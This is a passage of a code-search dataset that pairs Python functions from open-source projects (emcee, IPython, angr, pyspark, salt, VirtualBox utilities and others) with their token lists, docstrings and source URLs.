"range", "(", "num_args", ")", "]", "if", "len", "(", "var_names", ")", "!=", "num_vars", ":", "raise", "ValueError", "(", "\"The sampler has {} variables, but only {} var_names were provided!\"", ".", "format", "(", "num_vars", ",", "len", "(", "var_names", ")", ")", ")", "if", "len", "(", "arg_names", ")", "!=", "num_args", ":", "raise", "ValueError", "(", "\"The sampler has {} args, but only {} arg_names were provided!\"", ".", "format", "(", "num_args", ",", "len", "(", "arg_names", ")", ")", ")", "return", "var_names", ",", "arg_names" ]
Make sure var_names and arg_names are assigned reasonably. This is meant to run before loading emcee objects into InferenceData. In case var_names or arg_names is None, will provide defaults. If they are not None, it verifies there are the right number of them. Throws a ValueError in case validation fails. Parameters ---------- sampler : emcee.EnsembleSampler Fitted emcee sampler var_names : list[str] or None Names for the emcee parameters arg_names : list[str] or None Names for the args/observations provided to emcee Returns ------- list[str], list[str] Defaults for var_names and arg_names
[ "Make", "sure", "var_names", "and", "arg_names", "are", "assigned", "reasonably", "." ]
python
train
flowersteam/explauto
explauto/sensorimotor_model/inverse/cma.py
https://github.com/flowersteam/explauto/blob/cf0f81ecb9f6412f7276a95bd27359000e1e26b6/explauto/sensorimotor_model/inverse/cma.py#L8577-L8579
def felli(x): """unbound test function, needed to test multiprocessor""" return sum(1e6**(np.arange(len(x)) / (len(x) - 1)) * (np.array(x, copy=False))**2)
[ "def", "felli", "(", "x", ")", ":", "return", "sum", "(", "1e6", "**", "(", "np", ".", "arange", "(", "len", "(", "x", ")", ")", "/", "(", "len", "(", "x", ")", "-", "1", ")", ")", "*", "(", "np", ".", "array", "(", "x", ",", "copy", "=", "False", ")", ")", "**", "2", ")" ]
unbound test function, needed to test multiprocessor
[ "unbound", "test", "function", "needed", "to", "test", "multiprocessor" ]
python
train
cloud9ers/gurumate
environment/lib/python2.7/site-packages/IPython/core/extensions.py
https://github.com/cloud9ers/gurumate/blob/075dc74d1ee62a8c6b7a8bf2b271364f01629d1e/environment/lib/python2.7/site-packages/IPython/core/extensions.py#L130-L157
def install_extension(self, url, filename=None): """Download and install an IPython extension. If filename is given, the file will be so named (inside the extension directory). Otherwise, the name from the URL will be used. The file must have a .py or .zip extension; otherwise, a ValueError will be raised. Returns the full path to the installed file. """ # Ensure the extension directory exists if not os.path.isdir(self.ipython_extension_dir): os.makedirs(self.ipython_extension_dir, mode = 0777) if os.path.isfile(url): src_filename = os.path.basename(url) copy = copyfile else: src_filename = urlparse(url).path.split('/')[-1] copy = urlretrieve if filename is None: filename = src_filename if os.path.splitext(filename)[1] not in ('.py', '.zip'): raise ValueError("The file must have a .py or .zip extension", filename) filename = os.path.join(self.ipython_extension_dir, filename) copy(url, filename) return filename
[ "def", "install_extension", "(", "self", ",", "url", ",", "filename", "=", "None", ")", ":", "# Ensure the extension directory exists", "if", "not", "os", ".", "path", ".", "isdir", "(", "self", ".", "ipython_extension_dir", ")", ":", "os", ".", "makedirs", "(", "self", ".", "ipython_extension_dir", ",", "mode", "=", "0777", ")", "if", "os", ".", "path", ".", "isfile", "(", "url", ")", ":", "src_filename", "=", "os", ".", "path", ".", "basename", "(", "url", ")", "copy", "=", "copyfile", "else", ":", "src_filename", "=", "urlparse", "(", "url", ")", ".", "path", ".", "split", "(", "'/'", ")", "[", "-", "1", "]", "copy", "=", "urlretrieve", "if", "filename", "is", "None", ":", "filename", "=", "src_filename", "if", "os", ".", "path", ".", "splitext", "(", "filename", ")", "[", "1", "]", "not", "in", "(", "'.py'", ",", "'.zip'", ")", ":", "raise", "ValueError", "(", "\"The file must have a .py or .zip extension\"", ",", "filename", ")", "filename", "=", "os", ".", "path", ".", "join", "(", "self", ".", "ipython_extension_dir", ",", "filename", ")", "copy", "(", "url", ",", "filename", ")", "return", "filename" ]
Download and install an IPython extension. If filename is given, the file will be so named (inside the extension directory). Otherwise, the name from the URL will be used. The file must have a .py or .zip extension; otherwise, a ValueError will be raised. Returns the full path to the installed file.
[ "Download", "and", "install", "an", "IPython", "extension", ".", "If", "filename", "is", "given", "the", "file", "will", "be", "so", "named", "(", "inside", "the", "extension", "directory", ")", ".", "Otherwise", "the", "name", "from", "the", "URL", "will", "be", "used", ".", "The", "file", "must", "have", "a", ".", "py", "or", ".", "zip", "extension", ";", "otherwise", "a", "ValueError", "will", "be", "raised", ".", "Returns", "the", "full", "path", "to", "the", "installed", "file", "." ]
python
test
siznax/wptools
wptools/page.py
https://github.com/siznax/wptools/blob/100eaea585c34aa9ad87a9eda8982bb4898f6ec9/wptools/page.py#L472-L481
def _update_params(self): """ update params from response data """ if self.data.get('title'): self.params['title'] = self.data.get('title') if self.data.get('pageid'): self.params['pageid'] = self.data.get('pageid') if self.data.get('wikibase'): self.params['wikibase'] = self.data.get('wikibase')
[ "def", "_update_params", "(", "self", ")", ":", "if", "self", ".", "data", ".", "get", "(", "'title'", ")", ":", "self", ".", "params", "[", "'title'", "]", "=", "self", ".", "data", ".", "get", "(", "'title'", ")", "if", "self", ".", "data", ".", "get", "(", "'pageid'", ")", ":", "self", ".", "params", "[", "'pageid'", "]", "=", "self", ".", "data", ".", "get", "(", "'pageid'", ")", "if", "self", ".", "data", ".", "get", "(", "'wikibase'", ")", ":", "self", ".", "params", "[", "'wikibase'", "]", "=", "self", ".", "data", ".", "get", "(", "'wikibase'", ")" ]
update params from response data
[ "update", "params", "from", "response", "data" ]
python
train
trendels/rhino
rhino/request.py
https://github.com/trendels/rhino/blob/f1f0ef21b6080a2bd130b38b5bef163074c94aed/rhino/request.py#L364-L370
def input(self): """Returns a file-like object representing the request body.""" if self._input is None: input_file = self.environ['wsgi.input'] content_length = self.content_length or 0 self._input = WsgiInput(input_file, self.content_length) return self._input
[ "def", "input", "(", "self", ")", ":", "if", "self", ".", "_input", "is", "None", ":", "input_file", "=", "self", ".", "environ", "[", "'wsgi.input'", "]", "content_length", "=", "self", ".", "content_length", "or", "0", "self", ".", "_input", "=", "WsgiInput", "(", "input_file", ",", "self", ".", "content_length", ")", "return", "self", ".", "_input" ]
Returns a file-like object representing the request body.
[ "Returns", "a", "file", "-", "like", "object", "representing", "the", "request", "body", "." ]
python
train
angr/angr
angr/project.py
https://github.com/angr/angr/blob/4e2f97d56af5419ee73bdb30482c8dd8ff5f3e40/angr/project.py#L17-L34
def load_shellcode(shellcode, arch, start_offset=0, load_address=0): """ Load a new project based on a string of raw bytecode. :param shellcode: The data to load :param arch: The name of the arch to use, or an archinfo class :param start_offset: The offset into the data to start analysis (default 0) :param load_address: The address to place the data in memory (default 0) """ return Project( BytesIO(shellcode), main_opts={ 'backend': 'blob', 'arch': arch, 'entry_point': start_offset, 'base_addr': load_address, } )
[ "def", "load_shellcode", "(", "shellcode", ",", "arch", ",", "start_offset", "=", "0", ",", "load_address", "=", "0", ")", ":", "return", "Project", "(", "BytesIO", "(", "shellcode", ")", ",", "main_opts", "=", "{", "'backend'", ":", "'blob'", ",", "'arch'", ":", "arch", ",", "'entry_point'", ":", "start_offset", ",", "'base_addr'", ":", "load_address", ",", "}", ")" ]
Load a new project based on a string of raw bytecode. :param shellcode: The data to load :param arch: The name of the arch to use, or an archinfo class :param start_offset: The offset into the data to start analysis (default 0) :param load_address: The address to place the data in memory (default 0)
[ "Load", "a", "new", "project", "based", "on", "a", "string", "of", "raw", "bytecode", "." ]
python
train
bcbio/bcbio-nextgen
bcbio/distributed/resources.py
https://github.com/bcbio/bcbio-nextgen/blob/6a9348c0054ccd5baffd22f1bb7d0422f6978b20/bcbio/distributed/resources.py#L119-L130
def _scale_jobs_to_memory(jobs, mem_per_core, sysinfo): """When scheduling jobs with single cores, avoid overscheduling due to memory. """ if "cores" not in sysinfo: return jobs, 1.0 sys_mem_per_core = float(sysinfo["memory"]) / float(sysinfo["cores"]) if sys_mem_per_core < mem_per_core: pct = sys_mem_per_core / float(mem_per_core) target_jobs = int(math.floor(jobs * pct)) return max(target_jobs, 1), pct else: return jobs, 1.0
[ "def", "_scale_jobs_to_memory", "(", "jobs", ",", "mem_per_core", ",", "sysinfo", ")", ":", "if", "\"cores\"", "not", "in", "sysinfo", ":", "return", "jobs", ",", "1.0", "sys_mem_per_core", "=", "float", "(", "sysinfo", "[", "\"memory\"", "]", ")", "/", "float", "(", "sysinfo", "[", "\"cores\"", "]", ")", "if", "sys_mem_per_core", "<", "mem_per_core", ":", "pct", "=", "sys_mem_per_core", "/", "float", "(", "mem_per_core", ")", "target_jobs", "=", "int", "(", "math", ".", "floor", "(", "jobs", "*", "pct", ")", ")", "return", "max", "(", "target_jobs", ",", "1", ")", ",", "pct", "else", ":", "return", "jobs", ",", "1.0" ]
When scheduling jobs with single cores, avoid overscheduling due to memory.
[ "When", "scheduling", "jobs", "with", "single", "cores", "avoid", "overscheduling", "due", "to", "memory", "." ]
python
train
gbiggs/rtsprofile
rtsprofile/targets.py
https://github.com/gbiggs/rtsprofile/blob/fded6eddcb0b25fe9808b1b12336a4413ea00905/rtsprofile/targets.py#L160-L172
def to_dict(self): '''Save this target component into a dictionary.''' d = {'componentId': self.component_id, 'instanceName': self.instance_name} props = [] for name in self.properties: p = {'name': name} if self.properties[name]: p['value'] = str(self.properties[name]) props.append(p) if props: d[RTS_EXT_NS_YAML + 'properties'] = props return d
[ "def", "to_dict", "(", "self", ")", ":", "d", "=", "{", "'componentId'", ":", "self", ".", "component_id", ",", "'instanceName'", ":", "self", ".", "instance_name", "}", "props", "=", "[", "]", "for", "name", "in", "self", ".", "properties", ":", "p", "=", "{", "'name'", ":", "name", "}", "if", "self", ".", "properties", "[", "name", "]", ":", "p", "[", "'value'", "]", "=", "str", "(", "self", ".", "properties", "[", "name", "]", ")", "props", ".", "append", "(", "p", ")", "if", "props", ":", "d", "[", "RTS_EXT_NS_YAML", "+", "'properties'", "]", "=", "props", "return", "d" ]
Save this target component into a dictionary.
[ "Save", "this", "target", "component", "into", "a", "dictionary", "." ]
python
train
apache/incubator-mxnet
python/mxnet/contrib/onnx/onnx2mx/_op_translations.py
https://github.com/apache/incubator-mxnet/blob/1af29e9c060a4c7d60eeaacba32afdb9a7775ba7/python/mxnet/contrib/onnx/onnx2mx/_op_translations.py#L390-L395
def global_maxpooling(attrs, inputs, proto_obj): """Performs max pooling on the input.""" new_attrs = translation_utils._add_extra_attributes(attrs, {'global_pool': True, 'kernel': (1, 1), 'pool_type': 'max'}) return 'Pooling', new_attrs, inputs
[ "def", "global_maxpooling", "(", "attrs", ",", "inputs", ",", "proto_obj", ")", ":", "new_attrs", "=", "translation_utils", ".", "_add_extra_attributes", "(", "attrs", ",", "{", "'global_pool'", ":", "True", ",", "'kernel'", ":", "(", "1", ",", "1", ")", ",", "'pool_type'", ":", "'max'", "}", ")", "return", "'Pooling'", ",", "new_attrs", ",", "inputs" ]
Performs max pooling on the input.
[ "Performs", "max", "pooling", "on", "the", "input", "." ]
python
train
apache/spark
python/pyspark/mllib/linalg/__init__.py
https://github.com/apache/spark/blob/618d6bff71073c8c93501ab7392c3cc579730f0b/python/pyspark/mllib/linalg/__init__.py#L1082-L1095
def toArray(self): """ Return an numpy.ndarray >>> m = DenseMatrix(2, 2, range(4)) >>> m.toArray() array([[ 0., 2.], [ 1., 3.]]) """ if self.isTransposed: return np.asfortranarray( self.values.reshape((self.numRows, self.numCols))) else: return self.values.reshape((self.numRows, self.numCols), order='F')
[ "def", "toArray", "(", "self", ")", ":", "if", "self", ".", "isTransposed", ":", "return", "np", ".", "asfortranarray", "(", "self", ".", "values", ".", "reshape", "(", "(", "self", ".", "numRows", ",", "self", ".", "numCols", ")", ")", ")", "else", ":", "return", "self", ".", "values", ".", "reshape", "(", "(", "self", ".", "numRows", ",", "self", ".", "numCols", ")", ",", "order", "=", "'F'", ")" ]
Return an numpy.ndarray >>> m = DenseMatrix(2, 2, range(4)) >>> m.toArray() array([[ 0., 2.], [ 1., 3.]])
[ "Return", "an", "numpy", ".", "ndarray" ]
python
train
pmacosta/peng
peng/wave_core.py
https://github.com/pmacosta/peng/blob/976935377adaa3de26fc5677aceb2cdfbd6f93a7/peng/wave_core.py#L87-L97
def _homogenize_waves(wave_a, wave_b): """ Generate combined independent variable vector. The combination is from two waveforms and the (possibly interpolated) dependent variable vectors of these two waveforms """ indep_vector = _get_indep_vector(wave_a, wave_b) dep_vector_a = _interp_dep_vector(wave_a, indep_vector) dep_vector_b = _interp_dep_vector(wave_b, indep_vector) return (indep_vector, dep_vector_a, dep_vector_b)
[ "def", "_homogenize_waves", "(", "wave_a", ",", "wave_b", ")", ":", "indep_vector", "=", "_get_indep_vector", "(", "wave_a", ",", "wave_b", ")", "dep_vector_a", "=", "_interp_dep_vector", "(", "wave_a", ",", "indep_vector", ")", "dep_vector_b", "=", "_interp_dep_vector", "(", "wave_b", ",", "indep_vector", ")", "return", "(", "indep_vector", ",", "dep_vector_a", ",", "dep_vector_b", ")" ]
Generate combined independent variable vector. The combination is from two waveforms and the (possibly interpolated) dependent variable vectors of these two waveforms
[ "Generate", "combined", "independent", "variable", "vector", "." ]
python
test
KE-works/pykechain
pykechain/client.py
https://github.com/KE-works/pykechain/blob/b0296cf34328fd41660bf6f0b9114fd0167c40c4/pykechain/client.py#L290-L310
def reload(self, obj, extra_params=None): """Reload an object from server. This method is immutable and will return a new object. :param obj: object to reload :type obj: :py:obj:`obj` :param extra_params: additional object specific extra query string params (eg for activity) :type extra_params: dict :return: a new object :raises NotFoundError: if original object is not found or deleted in the mean time """ if not obj._json_data.get('url'): # pragma: no cover raise NotFoundError("Could not reload object, there is no url for object '{}' configured".format(obj)) response = self._request('GET', obj._json_data.get('url'), params=extra_params) if response.status_code != requests.codes.ok: # pragma: no cover raise NotFoundError("Could not reload object ({})".format(response)) data = response.json() return obj.__class__(data['results'][0], client=self)
[ "def", "reload", "(", "self", ",", "obj", ",", "extra_params", "=", "None", ")", ":", "if", "not", "obj", ".", "_json_data", ".", "get", "(", "'url'", ")", ":", "# pragma: no cover", "raise", "NotFoundError", "(", "\"Could not reload object, there is no url for object '{}' configured\"", ".", "format", "(", "obj", ")", ")", "response", "=", "self", ".", "_request", "(", "'GET'", ",", "obj", ".", "_json_data", ".", "get", "(", "'url'", ")", ",", "params", "=", "extra_params", ")", "if", "response", ".", "status_code", "!=", "requests", ".", "codes", ".", "ok", ":", "# pragma: no cover", "raise", "NotFoundError", "(", "\"Could not reload object ({})\"", ".", "format", "(", "response", ")", ")", "data", "=", "response", ".", "json", "(", ")", "return", "obj", ".", "__class__", "(", "data", "[", "'results'", "]", "[", "0", "]", ",", "client", "=", "self", ")" ]
Reload an object from server. This method is immutable and will return a new object. :param obj: object to reload :type obj: :py:obj:`obj` :param extra_params: additional object specific extra query string params (eg for activity) :type extra_params: dict :return: a new object :raises NotFoundError: if original object is not found or deleted in the mean time
[ "Reload", "an", "object", "from", "server", ".", "This", "method", "is", "immutable", "and", "will", "return", "a", "new", "object", "." ]
python
train
O365/python-o365
O365/connection.py
https://github.com/O365/python-o365/blob/02a71cf3775cc6a3c042e003365d6a07c8c75a73/O365/connection.py#L697-L706
def patch(self, url, data=None, **kwargs): """ Shorthand for self.oauth_request(url, 'patch') :param str url: url to send patch oauth request to :param dict data: patch data to update the service :param kwargs: extra params to send to request api :return: Response of the request :rtype: requests.Response """ return self.oauth_request(url, 'patch', data=data, **kwargs)
[ "def", "patch", "(", "self", ",", "url", ",", "data", "=", "None", ",", "*", "*", "kwargs", ")", ":", "return", "self", ".", "oauth_request", "(", "url", ",", "'patch'", ",", "data", "=", "data", ",", "*", "*", "kwargs", ")" ]
Shorthand for self.oauth_request(url, 'patch') :param str url: url to send patch oauth request to :param dict data: patch data to update the service :param kwargs: extra params to send to request api :return: Response of the request :rtype: requests.Response
[ "Shorthand", "for", "self", ".", "oauth_request", "(", "url", "patch", ")" ]
python
train
hydpy-dev/hydpy
hydpy/auxs/xmltools.py
https://github.com/hydpy-dev/hydpy/blob/1bc6a82cf30786521d86b36e27900c6717d3348d/hydpy/auxs/xmltools.py#L1778-L1819
def get_mathitemsinsertion(cls, indent) -> str: """Return a string defining a model specific XML type extending `ItemType`. >>> from hydpy.auxs.xmltools import XSDWriter >>> print(XSDWriter.get_mathitemsinsertion(1)) # doctest: +ELLIPSIS <complexType name="arma_v1_mathitemType"> <complexContent> <extension base="hpcb:setitemType"> <choice> <element name="control.responses"/> ... <element name="logs.logout"/> </choice> </extension> </complexContent> </complexType> <BLANKLINE> <complexType name="dam_v001_mathitemType"> ... """ blanks = ' ' * (indent*4) subs = [] for modelname in cls.get_modelnames(): model = importtools.prepare_model(modelname) subs.extend([ f'{blanks}<complexType name="{modelname}_mathitemType">', f'{blanks} <complexContent>', f'{blanks} <extension base="hpcb:setitemType">', f'{blanks} <choice>']) for subvars in cls._get_subvars(model): for var in subvars: subs.append( f'{blanks} ' f'<element name="{subvars.name}.{var.name}"/>') subs.extend([ f'{blanks} </choice>', f'{blanks} </extension>', f'{blanks} </complexContent>', f'{blanks}</complexType>', f'']) return '\n'.join(subs)
[ "def", "get_mathitemsinsertion", "(", "cls", ",", "indent", ")", "->", "str", ":", "blanks", "=", "' '", "*", "(", "indent", "*", "4", ")", "subs", "=", "[", "]", "for", "modelname", "in", "cls", ".", "get_modelnames", "(", ")", ":", "model", "=", "importtools", ".", "prepare_model", "(", "modelname", ")", "subs", ".", "extend", "(", "[", "f'{blanks}<complexType name=\"{modelname}_mathitemType\">'", ",", "f'{blanks} <complexContent>'", ",", "f'{blanks} <extension base=\"hpcb:setitemType\">'", ",", "f'{blanks} <choice>'", "]", ")", "for", "subvars", "in", "cls", ".", "_get_subvars", "(", "model", ")", ":", "for", "var", "in", "subvars", ":", "subs", ".", "append", "(", "f'{blanks} '", "f'<element name=\"{subvars.name}.{var.name}\"/>'", ")", "subs", ".", "extend", "(", "[", "f'{blanks} </choice>'", ",", "f'{blanks} </extension>'", ",", "f'{blanks} </complexContent>'", ",", "f'{blanks}</complexType>'", ",", "f''", "]", ")", "return", "'\\n'", ".", "join", "(", "subs", ")" ]
Return a string defining a model specific XML type extending `ItemType`. >>> from hydpy.auxs.xmltools import XSDWriter >>> print(XSDWriter.get_mathitemsinsertion(1)) # doctest: +ELLIPSIS <complexType name="arma_v1_mathitemType"> <complexContent> <extension base="hpcb:setitemType"> <choice> <element name="control.responses"/> ... <element name="logs.logout"/> </choice> </extension> </complexContent> </complexType> <BLANKLINE> <complexType name="dam_v001_mathitemType"> ...
[ "Return", "a", "string", "defining", "a", "model", "specific", "XML", "type", "extending", "ItemType", "." ]
python
train
saulpw/visidata
visidata/vdtui.py
https://github.com/saulpw/visidata/blob/32771e0cea6c24fc7902683d14558391395c591f/visidata/vdtui.py#L2229-L2234
def setValueSafe(self, row, value): 'setValue and ignore exceptions' try: return self.setValue(row, value) except Exception as e: exceptionCaught(e)
[ "def", "setValueSafe", "(", "self", ",", "row", ",", "value", ")", ":", "try", ":", "return", "self", ".", "setValue", "(", "row", ",", "value", ")", "except", "Exception", "as", "e", ":", "exceptionCaught", "(", "e", ")" ]
setValue and ignore exceptions
[ "setValue", "and", "ignore", "exceptions" ]
python
train
saltstack/salt
salt/modules/redismod.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/modules/redismod.py#L434-L447
def hvals(key, host=None, port=None, db=None, password=None): ''' Return all the values in a hash. .. versionadded:: 2017.7.0 CLI Example: .. code-block:: bash salt '*' redis.hvals foo_hash bar_field1 bar_value1 ''' server = _connect(host, port, db, password) return server.hvals(key)
[ "def", "hvals", "(", "key", ",", "host", "=", "None", ",", "port", "=", "None", ",", "db", "=", "None", ",", "password", "=", "None", ")", ":", "server", "=", "_connect", "(", "host", ",", "port", ",", "db", ",", "password", ")", "return", "server", ".", "hvals", "(", "key", ")" ]
Return all the values in a hash. .. versionadded:: 2017.7.0 CLI Example: .. code-block:: bash salt '*' redis.hvals foo_hash bar_field1 bar_value1
[ "Return", "all", "the", "values", "in", "a", "hash", "." ]
python
train
openstack/networking-cisco
networking_cisco/ml2_drivers/nexus/nexus_restapi_network_driver.py
https://github.com/openstack/networking-cisco/blob/aa58a30aec25b86f9aa5952b0863045975debfa9/networking_cisco/ml2_drivers/nexus/nexus_restapi_network_driver.py#L792-L804
def disable_vlan_on_trunk_int(self, nexus_host, vlanid, intf_type, interface, is_native): """Disable a VLAN on a trunk interface.""" starttime = time.time() path_snip, body_snip = self._get_vlan_body_on_trunk_int( nexus_host, vlanid, intf_type, interface, is_native, True, False) self.send_edit_string(nexus_host, path_snip, body_snip) self.capture_and_print_timeshot( starttime, "delif", switch=nexus_host)
[ "def", "disable_vlan_on_trunk_int", "(", "self", ",", "nexus_host", ",", "vlanid", ",", "intf_type", ",", "interface", ",", "is_native", ")", ":", "starttime", "=", "time", ".", "time", "(", ")", "path_snip", ",", "body_snip", "=", "self", ".", "_get_vlan_body_on_trunk_int", "(", "nexus_host", ",", "vlanid", ",", "intf_type", ",", "interface", ",", "is_native", ",", "True", ",", "False", ")", "self", ".", "send_edit_string", "(", "nexus_host", ",", "path_snip", ",", "body_snip", ")", "self", ".", "capture_and_print_timeshot", "(", "starttime", ",", "\"delif\"", ",", "switch", "=", "nexus_host", ")" ]
Disable a VLAN on a trunk interface.
[ "Disable", "a", "VLAN", "on", "a", "trunk", "interface", "." ]
python
train
JdeRobot/base
src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_map/mp_tile.py
https://github.com/JdeRobot/base/blob/303b18992785b2fe802212f2d758a60873007f1f/src/drivers/MAVLinkServer/MAVProxy/modules/mavproxy_map/mp_tile.py#L106-L117
def coord(self, offset=(0,0)): '''return lat,lon within a tile given (offsetx,offsety)''' (tilex, tiley) = self.tile (offsetx, offsety) = offset world_tiles = 1<<self.zoom x = ( tilex + 1.0*offsetx/TILES_WIDTH ) / (world_tiles/2.) - 1 y = ( tiley + 1.0*offsety/TILES_HEIGHT) / (world_tiles/2.) - 1 lon = x * 180.0 y = math.exp(-y*2*math.pi) e = (y-1)/(y+1) lat = 180.0/math.pi * math.asin(e) return (lat, lon)
[ "def", "coord", "(", "self", ",", "offset", "=", "(", "0", ",", "0", ")", ")", ":", "(", "tilex", ",", "tiley", ")", "=", "self", ".", "tile", "(", "offsetx", ",", "offsety", ")", "=", "offset", "world_tiles", "=", "1", "<<", "self", ".", "zoom", "x", "=", "(", "tilex", "+", "1.0", "*", "offsetx", "/", "TILES_WIDTH", ")", "/", "(", "world_tiles", "/", "2.", ")", "-", "1", "y", "=", "(", "tiley", "+", "1.0", "*", "offsety", "/", "TILES_HEIGHT", ")", "/", "(", "world_tiles", "/", "2.", ")", "-", "1", "lon", "=", "x", "*", "180.0", "y", "=", "math", ".", "exp", "(", "-", "y", "*", "2", "*", "math", ".", "pi", ")", "e", "=", "(", "y", "-", "1", ")", "/", "(", "y", "+", "1", ")", "lat", "=", "180.0", "/", "math", ".", "pi", "*", "math", ".", "asin", "(", "e", ")", "return", "(", "lat", ",", "lon", ")" ]
return lat,lon within a tile given (offsetx,offsety)
[ "return", "lat", "lon", "within", "a", "tile", "given", "(", "offsetx", "offsety", ")" ]
python
train
crackinglandia/pype32
pype32/pype32.py
https://github.com/crackinglandia/pype32/blob/192fd14dfc0dd36d953739a81c17fbaf5e3d6076/pype32/pype32.py#L627-L650
def _adjustFileAlignment(self, value, fileAlignment): """ Align a value to C{FileAligment}. @type value: int @param value: The value to align. @type fileAlignment: int @param fileAlignment: The value to be used to align the C{value} parameter. @rtype: int @return: The aligned value. """ if fileAlignment > consts.DEFAULT_FILE_ALIGNMENT: if not utils.powerOfTwo(fileAlignment): print "Warning: FileAlignment is greater than DEFAULT_FILE_ALIGNMENT (0x200) and is not power of two." if fileAlignment < consts.DEFAULT_FILE_ALIGNMENT: return value if fileAlignment and value % fileAlignment: return ((value / fileAlignment) + 1) * fileAlignment return value
[ "def", "_adjustFileAlignment", "(", "self", ",", "value", ",", "fileAlignment", ")", ":", "if", "fileAlignment", ">", "consts", ".", "DEFAULT_FILE_ALIGNMENT", ":", "if", "not", "utils", ".", "powerOfTwo", "(", "fileAlignment", ")", ":", "print", "\"Warning: FileAlignment is greater than DEFAULT_FILE_ALIGNMENT (0x200) and is not power of two.\"", "if", "fileAlignment", "<", "consts", ".", "DEFAULT_FILE_ALIGNMENT", ":", "return", "value", "if", "fileAlignment", "and", "value", "%", "fileAlignment", ":", "return", "(", "(", "value", "/", "fileAlignment", ")", "+", "1", ")", "*", "fileAlignment", "return", "value" ]
Align a value to C{FileAligment}. @type value: int @param value: The value to align. @type fileAlignment: int @param fileAlignment: The value to be used to align the C{value} parameter. @rtype: int @return: The aligned value.
[ "Align", "a", "value", "to", "C", "{", "FileAligment", "}", "." ]
python
train
arlyon/hyperion
hyperion/models/bike.py
https://github.com/arlyon/hyperion/blob/d8de0388ba98b85ce472e0f49ac18fecb14d3343/hyperion/models/bike.py#L29-L37
def get_most_recent_bike() -> Optional['Bike']: """ Gets the most recently cached bike from the database. :return: The bike that was cached most recently. """ try: return Bike.select().order_by(Bike.cached_date.desc()).get() except pw.DoesNotExist: return None
[ "def", "get_most_recent_bike", "(", ")", "->", "Optional", "[", "'Bike'", "]", ":", "try", ":", "return", "Bike", ".", "select", "(", ")", ".", "order_by", "(", "Bike", ".", "cached_date", ".", "desc", "(", ")", ")", ".", "get", "(", ")", "except", "pw", ".", "DoesNotExist", ":", "return", "None" ]
Gets the most recently cached bike from the database. :return: The bike that was cached most recently.
[ "Gets", "the", "most", "recently", "cached", "bike", "from", "the", "database", ".", ":", "return", ":", "The", "bike", "that", "was", "cached", "most", "recently", "." ]
python
test
tsnaomi/finnsyll
finnsyll/prev/v10.py
https://github.com/tsnaomi/finnsyll/blob/6a42740311688c946a636a3e2304866c7aa041b3/finnsyll/prev/v10.py#L179-L195
def apply_T2(word): '''There is a syllable boundary within a VV sequence of two nonidentical vowels that are not a genuine diphthong, e.g., [ta.e], [ko.et.taa].''' WORD = word offset = 0 for vv in vv_sequences(WORD): seq = vv.group(2) if not is_diphthong(seq) and not is_long(seq): i = vv.start(2) + 1 + offset WORD = WORD[:i] + '.' + WORD[i:] offset += 1 RULE = ' T2' if word != WORD else '' return WORD, RULE
[ "def", "apply_T2", "(", "word", ")", ":", "WORD", "=", "word", "offset", "=", "0", "for", "vv", "in", "vv_sequences", "(", "WORD", ")", ":", "seq", "=", "vv", ".", "group", "(", "2", ")", "if", "not", "is_diphthong", "(", "seq", ")", "and", "not", "is_long", "(", "seq", ")", ":", "i", "=", "vv", ".", "start", "(", "2", ")", "+", "1", "+", "offset", "WORD", "=", "WORD", "[", ":", "i", "]", "+", "'.'", "+", "WORD", "[", "i", ":", "]", "offset", "+=", "1", "RULE", "=", "' T2'", "if", "word", "!=", "WORD", "else", "''", "return", "WORD", ",", "RULE" ]
There is a syllable boundary within a VV sequence of two nonidentical vowels that are not a genuine diphthong, e.g., [ta.e], [ko.et.taa].
[ "There", "is", "a", "syllable", "boundary", "within", "a", "VV", "sequence", "of", "two", "nonidentical", "vowels", "that", "are", "not", "a", "genuine", "diphthong", "e", ".", "g", ".", "[", "ta", ".", "e", "]", "[", "ko", ".", "et", ".", "taa", "]", "." ]
python
train
sdispater/orator
orator/orm/relations/belongs_to_many.py
https://github.com/sdispater/orator/blob/bd90bf198ee897751848f9a92e49d18e60a74136/orator/orm/relations/belongs_to_many.py#L310-L321
def _set_where(self): """ Set the where clause for the relation query. :return: self :rtype: BelongsToMany """ foreign = self.get_foreign_key() self._query.where(foreign, "=", self._parent.get_key()) return self
[ "def", "_set_where", "(", "self", ")", ":", "foreign", "=", "self", ".", "get_foreign_key", "(", ")", "self", ".", "_query", ".", "where", "(", "foreign", ",", "\"=\"", ",", "self", ".", "_parent", ".", "get_key", "(", ")", ")", "return", "self" ]
Set the where clause for the relation query. :return: self :rtype: BelongsToMany
[ "Set", "the", "where", "clause", "for", "the", "relation", "query", "." ]
python
train
saltstack/salt
salt/utils/virtualbox.py
https://github.com/saltstack/salt/blob/e8541fd6e744ab0df786c0f76102e41631f45d46/salt/utils/virtualbox.py#L371-L415
def vb_clone_vm( name=None, clone_from=None, clone_mode=0, timeout=10000, **kwargs ): ''' Tells virtualbox to create a VM by cloning from an existing one @param name: Name for the new VM @type name: str @param clone_from: @type clone_from: str @param timeout: maximum time in milliseconds to wait or -1 to wait indefinitely @type timeout: int @return dict of resulting VM ''' vbox = vb_get_box() log.info('Clone virtualbox machine %s from %s', name, clone_from) source_machine = vbox.findMachine(clone_from) groups = None os_type_id = 'Other' new_machine = vbox.createMachine( None, # Settings file name, groups, os_type_id, None # flags ) progress = source_machine.cloneTo( new_machine, clone_mode, # CloneMode None # CloneOptions : None = Full? ) progress.waitForCompletion(timeout) log.info('Finished cloning %s from %s', name, clone_from) vbox.registerMachine(new_machine) return vb_xpcom_to_attribute_dict(new_machine, 'IMachine')
